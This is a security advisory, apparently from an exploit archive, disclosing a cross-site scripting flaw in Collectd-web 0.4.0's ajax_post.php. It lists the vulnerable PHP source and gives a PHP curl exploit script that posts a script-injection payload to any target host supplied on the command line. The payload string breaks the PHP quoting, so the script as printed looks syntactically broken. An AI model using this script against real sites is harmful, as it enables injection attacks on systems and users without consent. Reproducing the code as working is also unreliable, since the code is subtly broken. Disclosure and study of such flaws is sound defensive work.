Title -Collectd-web XSS

# Exploit Title :  XSS Vulnerabilitie in Collectd-web
# Date: Sun May 22 11:55:36 EDT 2016
# Reported Date : Sun May 22 11:55:36 EDT 2016
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web
# Version: Version: 0.4.0
# Software Link: https://github.com/httpdss/collectd-web
# solution :https://github.com/httpdss/collectd-web/issues/77
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------

XSS Vulnerabilitie  in Collectd-web  0.4.0 – January2016


2. BACKGROUND
-------------------------
Collectd-web is a web-based front-end for RRD data collected by collectd.
It is based on contrib/collection.cgi, a demo CGI script included in
collectd.
With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web
manages to give sysadmins a nice yet functional interface.


3. DESCRIPTION
-------------------------
XSS in ajax_post.php
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php

  1 <?php
  2 $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera
7");
  3 $movies = array("Transformers","Knocked Up","Live Free Die Hard");
  4 $title = "-";
  5 if ($_POST["zip"]) {
  6     $title = "Zip " . $_POST['zip'];
  7 } else {
  8     $title = $_POST['movie'];
  9 }
 10 ?>
 11 <div>
 12     <div class="toolbar">
 13         <h1><?php echo $title ?></h1>
 14         <a href="#" class="button back">Back</a>
 15     </div>
 16     <ul class="edgetoedge">
 17     <?php
 18         if ($_POST['zip']) {
 19             foreach ($theaters as $theater) {
 20                 echo '<li><a href="#theater">' . $theater . '</a></li>';
 21             }
 22         } else {
 23             foreach ($movies as $movie) {
 24                 echo '<li><a href="#movie">' . $movie . '</a></li>';
 25             }
 26         }
 27     ?>
 28     </ul>
 29     <form action="ajax_post.php" method="POST">
 30     <ul class="rounded">
 31         <li><input type="text" name="zip" value="" placeholder="Live
post event test" /></li>
 32     </ul>
 33     <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#"
class="submit whiteButton">Submit</a>
 34
 35     </form>
 36 </div>

in line 5 have VULNERABILITY in zip POST method


====================================Exploit=========================================
<?php
$yourtarget = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://
$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"movie=></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

====================================Exploit=========================================

4. discovered by :
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com


5 .LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.